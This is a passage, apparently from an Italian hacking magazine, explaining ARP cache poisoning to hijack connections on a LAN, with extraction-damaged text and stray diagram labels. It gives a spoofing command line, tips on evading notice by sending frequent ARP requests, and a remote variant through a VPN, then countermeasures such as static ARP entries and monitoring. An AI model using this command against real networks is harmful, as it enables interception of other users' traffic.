# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 MACNO-STRO IPROUTER 00:00:00:00:00:00 1.1.1.1 1000000

Con questo pacchetto la cache di tutta la LAN si aggiornerà. Pro-babilmente, l’attaccante invierà il pacchetto molto frequentemen-te, magari a ogni secondo, tanto per essere sicuro che il routernon mandi reply corretti o modifichi la cache. Siccome la cache

viene aggiornata a ogni secondo, A e B non invieranno mai lerichieste ARP. Utilizzando request invece che reply, l’attacker pas-serà probabilmente inosservato, non essendoci tracce evidenti diun attacco.

Tutto questo funziona solo all’interno di una LAN, ma è un attac-co molto efficace e da non sottovalutare. Tutti i computer della

LAN sono vulnerabili a questo tipo di attacchi. Per di più, l’at-tacco può essere portato anche da remoto se l’attacker en-

tra nella LAN attraverso un tunnel VPN. Una prima con-tromisura di difesa è quella di impostare le entry ARPcome statiche. La seconda è di monitorare gli ARP, peresempio implementando controlli ai dst IP. Ciò vuol direche per ogni host della LAN che l’attacker vuole dirotta-

re dovrà inviare un arp. Quindi se invia pacchetti a inter-valli di un secondo, per 100 host dovrà inviare 100 pac-

chetti ARP al secondo invece che 1. e quindi l’attacco dovreb-be essere più evidente. K

>>

A

Router

Internet

B

Dirottamento di una connessionecon spoofing delle tabelle ARP

>> Come difendersi

A

Router

Internet

B

C


hacker.journal.n..7

Documents